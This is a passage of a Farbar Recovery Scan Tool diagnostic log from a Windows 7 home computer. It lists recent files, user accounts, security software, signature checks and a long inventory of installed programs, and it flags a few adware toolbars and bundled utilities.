2016-11-08 19:54 - 2011-04-11 18:46 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2016-11-08 05:00 - 2014-10-10 12:01 - 00000000 ____D C:\Windows\Minidump
2016-11-08 04:59 - 2011-07-15 10:27 - 00336292 ____N C:\Windows\Minidump\110816-87688-01.dmp
2016-11-06 17:34 - 2016-02-24 18:09 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-11-01 14:43 - 2016-02-23 15:07 - 00001966 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
2016-11-01 14:43 - 2015-11-17 14:28 - 00000000 ____D C:\Program Files\McAfee Security Scan
2016-10-30 15:44 - 2011-08-11 17:42 - 00000000 ____D C:\Users\Kenneth\AppData\Local\Google
2016-10-25 19:04 - 2016-02-08 20:42 - 00000000 ____D C:\Users\Kenneth\AppData\Roaming\Apple Computer
2016-10-25 19:04 - 2016-02-08 20:42 - 00000000 ____D C:\Users\Kenneth\AppData\Local\Apple Computer
2016-10-25 19:04 - 2016-02-08 20:36 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-10-24 20:59 - 2012-04-21 11:52 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-10-24 12:57 - 2012-04-25 02:25 - 00122400 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll
2016-10-24 12:57 - 2012-04-25 02:25 - 00107520 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIinit.dll
2016-10-24 12:57 - 2012-04-25 02:25 - 00000000 ____D C:\Program Files (x86)\LogMeIn
 
==================== Files in the root of some directories =======
 
2012-08-01 19:03 - 2012-08-01 19:02 - 0022440 _____ () C:\Users\Kenneth\AppData\Local\11197219_Setup.crx
2013-03-07 18:56 - 2013-06-09 20:38 - 0922944 _____ () C:\Users\Kenneth\AppData\Local\a.zip
2013-03-07 18:56 - 2013-06-09 20:38 - 2162336 _____ (Catalina Marketing Corp) C:\Users\Kenneth\AppData\Local\BcsKtYcHW.dll
2011-11-23 18:41 - 2016-08-15 18:23 - 0007605 _____ () C:\Users\Kenneth\AppData\Local\Resmon.ResmonCfg
2011-08-11 12:25 - 2011-08-11 12:38 - 0000840 _____ () C:\ProgramData\hpzinstall.log
 
Some files in TEMP:
====================
C:\Users\Kenneth\AppData\Local\Temp\jre-8u111-windows-au.exe
C:\Users\Kenneth\AppData\Local\Temp\Quarantine.exe
C:\Users\Kenneth\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-11-14 23:22
 
==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 23-11-2016
Ran by Kenneth (23-11-2016 18:32:52)
Running from C:\Users\Kenneth\Downloads
Windows 7 Home Premium Service Pack 1 (X64) (2011-08-11 18:06:17)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1169555862-3845460206-1416485692-500 - Administrator - Disabled)
Guest (S-1-5-21-1169555862-3845460206-1416485692-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1169555862-3845460206-1416485692-1002 - Limited - Enabled)
Kenneth (S-1-5-21-1169555862-3845460206-1416485692-1000 - Administrator - Enabled) => C:\Users\Kenneth
LogMeInRemoteUser (S-1-5-21-1169555862-3845460206-1416485692-1004 - Administrator - Enabled) => C:\Users\LogMeInRemoteUser
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Norton Internet Security (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Internet Security (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Internet Security (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
8500A909_eDocs (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
8500A909_Help (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
8500A909a (x32 Version: 50.0.165.000 - Hewlett-Packard) Hidden
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.020.20042 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.3.9130 - Adobe Systems Inc.)
Adobe Digital Editions (HKLM-x32\...\Digital Editions) (Version:  - )
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Agatha Christie - Peril at End House (x32 Version: 2.2.0.95 - WildTangent) Hidden
Amazon Send to Kindle (HKLM-x32\...\SendToKindle) (Version: 1.0.1.240 - Amazon)
Apple Application Support (32-bit) (HKLM-x32\...\{F2871C89-C8A5-42EE-8D45-0F02506385A6}) (Version: 5.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{9BC93467-75D1-4AA4-BD58-D9C51D88DFAB}) (Version: 5.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Ask Toolbar (HKLM-x32\...\{4F524A2D-5637-006A-76A7-A758B70C1500}) (Version: 12.21.0.125 - APN, LLC) <==== ATTENTION
ATI Catalyst Install Manager (HKLM\...\{8E9405C3-4A81-A757-1670-56B202B46F3C}) (Version: 3.0.820.0 - ATI Technologies, Inc.)
ATI Problem Report Wizard (Version: 3.0.821.0 - ATI Technologies) Hidden
Bejeweled 2 Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bejeweled 3 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bing Bar (HKLM-x32\...\{3365E735-48A6-4194-9988-CE59AC5AE503}) (Version: 7.3.132.0 - Microsoft Corporation)
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Blasterball 3 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Blio (HKLM-x32\...\{9368DDD5-CE7F-4BD7-A83A-F00FABE338EC}) (Version: 2.2.6699 - K-NFB Reading Technology, Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Bounce Symphony (x32 Version: 2.2.0.95 - WildTangent) Hidden
BPD_DSWizards (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden
BPDSoftware (x32 Version: 50.0.165.000 - Hewlett-Packard) Hidden
BPDSoftware_Ini (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden
BufferChm (x32 Version: 130.0.331.000 - Hewlett-Packard) Hidden
Build-a-lot 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cake Mania (x32 Version: 2.2.0.95 - WildTangent) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Citrix Online Launcher (HKLM-x32\...\{3D5F07C3-1B93-47F8-9F8A-DE8E47BF1669}) (Version: 1.0.209 - Citrix)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Destinations (x32 Version: 130.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 130.0.465.000 - Hewlett-Packard) Hidden
Diner Dash 2 Restaurant Rescue (x32 Version: 2.2.0.95 - WildTangent) Hidden
DocMgr (x32 Version: 130.0.000.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Elevated Installer (x32 Version: 2.3.18.0 - Garmin Ltd or its subsidiaries) Hidden
eReg (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
e-Rewards Notify (HKLM-x32\...\{CA457C59-214E-421D-B2F7-D34FEC0FAB04}) (Version: 1.1.0.274 - e-Rewards Opinion Panel)
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
Farm Frenzy (x32 Version: 2.2.0.95 - WildTangent) Hidden
FATE - The Traitor Soul (x32 Version: 2.2.0.95 - WildTangent) Hidden
Fax (x32 Version: 130.0.418.000 - Hewlett-Packard) Hidden
Free Desktop Timer 1.2 (HKLM-x32\...\Free Desktop Timer_is1) (Version:  - Drive Software Company)
FreeCommander XE (HKLM-x32\...\FreeCommander XE_is1) (Version:  - Marek Jasinski)
Garmin Express (HKLM-x32\...\{0904cc72-1b29-426a-b0f0-228d2744a4f6}) (Version: 2.3.18.0 - Garmin Ltd or its subsidiaries)
Garmin Express (x32 Version: 2.3.18.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express Tray (x32 Version: 2.3.18.0 - Garmin Ltd or its subsidiaries) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7619.1252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
GPBaseService2 (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
Hewlett-Packard ACLM.NET v1.2.1.1 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Customer Participation Program 13.0 (HKLM\...\HPExtendedCapabilities) (Version: 13.0 - HP)
HP Document Manager 2.0 (HKLM\...\HP Document Manager) (Version: 2.0 - HP)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.2.4 - WildTangent)
HP Imaging Device Functions 13.0 (HKLM\...\HP Imaging Device Functions) (Version: 13.0 - HP)
HP LinkUp (HKLM-x32\...\{DB3147AB-4024-4773-8EC0-A1FE5B44933D}) (Version: 2.01.028 - Hewlett-Packard)
HP MediaSmart/TouchSmart Netflix (HKLM-x32\...\{BB760C1D-98F4-4E38-8CC4-3B67329AA981}) (Version: 1.0.6.0 - Hewlett-Packard)
HP MovieStore (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0 - Hewlett-Packard)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{210A03F5-B2ED-4947-B27E-516F50CBB292}) (Version: 8.6.4530.3651 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.1.13253.3682 - Hewlett-Packard Company)
HP Smart Web Printing 4.51 (HKLM\...\HP Smart Web Printing) (Version: 4.51 - HP)
HP Solution Center 13.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 13.0 - HP)
HP Support Assistant (HKLM-x32\...\{EE202411-2C26-49E8-9784-1BC1DBF7DE96}) (Version: 7.0.39.15 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\...\{7F2A11F4-EAE8-4325-83EC-E3E99F85169E}) (Version: 10.1.1000 - Hewlett-Packard)
HP Update (HKLM-x32\...\{DE77FE3F-A33D-499A-87AD-5FC406617B40}) (Version: 5.002.003.003 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\...\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.5.0.0 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0000 - Microsoft) Hidden
HPProductAssistant (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
HPSSupply (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
Hulu Desktop (HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\HuluDesktop) (Version: 0.9.13 - Hulu LLC)
HydraVision (x32 Version: 4.2.188.0 - ATI Technologies Inc.) Hidden
iCloud (HKLM\...\{29AAC3D3-23FC-496D-8266-0E3833686758}) (Version: 6.0.2.10 - Apple Inc.)
IDrive Version - 6.0 (HKLM-x32\...\IDrive_is1) (Version: 6.0 - Pro Softnet Corp)
iTunes (HKLM\...\{9946A4F7-E0FD-4A33-82D1-06CBFFBBB9F9}) (Version: 12.5.1.21 - Apple Inc.)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Kobo (HKLM-x32\...\Kobo) (Version: 1.6 - Kobo Inc.)
KODAK Share Button App (HKLM-x32\...\{C3F0CF4C-0A8C-42F1-A585-2EF7886D6039}) (Version: 4.03.0000.0000 - Eastman Kodak Company)
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.3609 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.3609 - CyberLink Corp.) Hidden
LG USB Modem driver (HKLM-x32\...\{C3ABE126-2BB2-4246-BFE1-6797679B3579}) (Version:  - )
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech)
LogMeIn (HKLM-x32\...\{2BFDA78F-39F7-4537-9995-71424CFA88BB}) (Version: 4.1.2138 - LogMeIn, Inc.)
LogMeIn Client (HKLM-x32\...\{26F88B15-E5F0-47D2-8176-1A9312DD44AD}) (Version: 1.3.1648 - LogMeIn, Inc.)
Logos Bible Software (HKLM-x32\...\{69D716F2-3E38-441C-B2E4-BAF2B3D0DED7}) (Version: 6.128.49 - Faithlife Corporation)
magicJack (HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\magicJack) (Version: 4.1.7574.5297 - magicJack L.P.)
magicJack Outlook Add-In 1.0.3.521 (HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\magicJack Outlook Add-In) (Version: 1.0.3.521 - magicJack)
Mah Jong Medley (x32 Version: 2.2.0.95 - WildTangent) Hidden
MarketResearch (x32 Version: 130.0.374.000 - Hewlett-Packard) Hidden
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.427.2 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{6965A8D2-465D-4F98-9FAA-0E9E2348F329}) (Version: 3.22.270.0 - Microsoft Corporation)
Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022.218 (HKLM-x32\...\{E503B4BF-F7BB-3D5F-8BC8-F694B1CFF942}) (Version: 9.0.21022.218 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mob Wars Toolbar (HKLM-x32\...\Mob Wars Toolbar) (Version:  - )
Mouse Recorder Pro 2.0.6.0 (HKLM-x32\...\{889E44CE-435C-4D37-B302-A7E43339E5FA}_is1) (Version:  - Nemex Studios)
Mozilla Firefox 50.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.0 (x86 en-US)) (Version: 50.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.0 - Mozilla)
Mozilla Thunderbird 24.3.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 24.3.0 (x86 en-US)) (Version: 24.3.0 - Mozilla)
mPlayer version 1.0 (HKLM-x32\...\{B482E758-D602-434C-80B9-DDEFEEAE4BCA}_is1) (Version: 1.0 - Download Freely, LLC)
MPM (HKLM-x32\...\{CD8C5C7F-7C58-4F85-8977-A6C08C087912}) (Version: 1.00.0000 - Hewlett-Packard)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyPoints Toolbar (HKLM-x32\...\MyPoints Toolbar) (Version:  - )
Mystery P.I. - Stolen in San Francisco (x32 Version: 2.2.0.95 - WildTangent) Hidden
Namco All-Stars PAC-MAN (x32 Version: 2.2.0.95 - WildTangent) Hidden
Network64 (Version: 130.0.579.000 - Hewlett-Packard) Hidden
Network64 (Version: 140.0.221.000 - Hewlett-Packard) Hidden
Norton Internet Security (HKLM-x32\...\NIS) (Version: 22.8.1.14 - Symantec Corporation)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.1.17869 - Symantec Corporation)
OCR Software by I.R.I.S. 13.0 (HKLM\...\HPOCR) (Version: 13.0 - HP)
Officejet Pro 8500 A909 Series (HKLM\...\{D850BEF5-67AF-4071-9538-FA9AC725D62C}) (Version: 13.0 - HP)
OverDrive Media Console (HKLM-x32\...\{D07205E7-F6D3-4333-AFCC-782A07685B72}) (Version: 3.2.20 - OverDrive, Inc.)
PC Medic 2.0.0 (HKLM-x32\...\PCMedic_is1) (Version: 2.0.0 - PCMedic Inc.)
PDF Complete Special Edition (HKLM-x32\...\PDF Complete) (Version: 4.0.35 - PDF Complete, Inc)
Penguins! (x32 Version: 2.2.0.95 - WildTangent) Hidden
Perky Duck 11.2 (HKLM-x32\...\{5F606A38-D310-4FEF-ABBD-E1A15AC0E6BE}) (Version: 11.2.0100 - Duxbury Systems, Inc.)
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.95 - WildTangent) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.95 - WildTangent) Hidden
Popcorn Time (HKLM-x32\...\{38B39D8E-1AEF-4F01-82BE-36F3307244F5}) (Version: 1.0.0 - Time4Popcorn) <==== ATTENTION
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4817 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.4817 - CyberLink Corp.) Hidden
ProductContext (x32 Version: 50.0.165.000 - Hewlett-Packard) Hidden
PRTG Network Monitor (HKLM-x32\...\{5EC294B8-98F8-4C20-BE73-F11A04295CA5}_is1) (Version: 9 - Paessler AG)
RealDownloader (x32 Version: 17.0.15.4 - RealNetworks, Inc.) Hidden
RealDownloader (x32 Version: 17.0.15.7 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (HKLM-x32\...\RealPlayer 15.0) (Version: 15.0.6 - RealNetworks)
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.15 - RealNetworks)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6251 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Recovery Manager (x32 Version: 5.5.3621 - CyberLink Corp.) Hidden
Remote Graphics Receiver (HKLM-x32\...\{16FC3056-90C0-4757-8A68-64D8DA846ADA}) (Version: 5.4.5 - Hewlett-Packard)
RoboForm 7-9-21-5 (All Users) (HKLM-x32\...\AI RoboForm) (Version: 7-9-21-5 - Siber Systems)
RoxioNow Player (HKLM-x32\...\{0EDEB615-1A60-425E-8306-0E10519C7B55}) (Version: 1.9.5.103 - RoxioNow)
Scan (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 13.0 - HP)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Slingo Supreme (x32 Version: 2.2.0.95 - WildTangent) Hidden
SmartWebPrinting (x32 Version: 130.0.457.000 - Hewlett-Packard) Hidden
SolutionCenter (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Status (x32 Version: 130.0.469.000 - Hewlett-Packard) Hidden
TaxACT 2011 - 1040 Edition (HKLM-x32\...\TaxACT 2011 - 1040 Edition) (Version:  - 2nd Story Software, Inc.)
TaxACT 2011 Alabama (HKLM-x32\...\TaxACT 2011 Alabama) (Version:  - 2nd Story Software, Inc.)
TaxACT 2012 - 1040 Edition (HKLM-x32\...\TaxACT 2012 - 1040 Edition) (Version:  - 2nd Story Software, Inc.)
TaxACT 2012 Alabama (HKLM-x32\...\TaxACT 2012 Alabama) (Version:  - 2nd Story Software, Inc.)
TaxACT 2013 - 1040 Edition (HKLM-x32\...\TaxACT 2013 - 1040 Edition) (Version:  - TaxACT, Inc.)
TaxACT 2013 Alabama (HKLM-x32\...\TaxACT 2013 Alabama) (Version:  - TaxACT, Inc.)
TaxACT 2014 - 1040 Edition (HKLM-x32\...\TaxACT 2014 - 1040 Edition) (Version: 1.00 - TaxACT, Inc.)
TaxACT 2014 Alabama (HKLM-x32\...\TaxACT 2014 Alabama) (Version: 1.01 - TaxACT, Inc.)
TaxAct 2015 1040 Edition (HKLM-x32\...\TaxAct 2015 1040 Edition) (Version: 1.00 - TaxAct, Inc.)
TaxAct 2015 Alabama (HKLM-x32\...\TaxAct 2015 Alabama) (Version: 1.02 - TaxAct, Inc.)
Toolbox (x32 Version: 130.0.648.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 130.0.422.000 - Hewlett-Packard) Hidden
UMPlayer 0.98 [Athlon] (HKLM-x32\...\UMPlayer) (Version: 0.98 - Ori Rejwan)
Unchecky v0.3.7 (HKLM-x32\...\Unchecky) (Version: 0.3.7 - RaMMicHaeL)
Uninstall Helper (HKLM-x32\...\Uninstall Helper 2.0.1.0) (Version: 2.0.1.0 - InstallX, LLC) <==== ATTENTION
Uninstall Helper (x32 Version: 2.0.1.0 - InstallX, LLC) Hidden <==== ATTENTION
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden
Verbum (HKLM-x32\...\{F734A2F2-135D-446C-B70F-6A857653B887}) (Version: 6.144.29 - Faithlife Corporation)
Video Downloader (x32 Version: 1.0.0 - RealNetworks) Hidden
Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.95 - WildTangent) Hidden
WebReg (x32 Version: 130.0.132.017 - Hewlett-Packard) Hidden
Wheel of Fortune 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
WildTangent Games App for HP (x32 Version: 4.0.11.2 - WildTangent) Hidden
Windows Driver Package - Eastman Kodak KODAK Digital Camera (01/29/2010 1.4.1.0) (HKLM\...\3D970B9F930E7AAE23C06D39A1AC98548C90B442) (Version: 01/29/2010 1.4.1.0 - Eastman Kodak)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
Yahoo Search Set (HKLM-x32\...\Yahoo! SearchSet) (Version:  - Yahoo Inc.)
Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {022C117D-A69C-45EA-A72E-0FB9E095E920} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1169555862-3845460206-1416485692-1000UA => C:\Users\Kenneth\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-11] (Facebook Inc.)
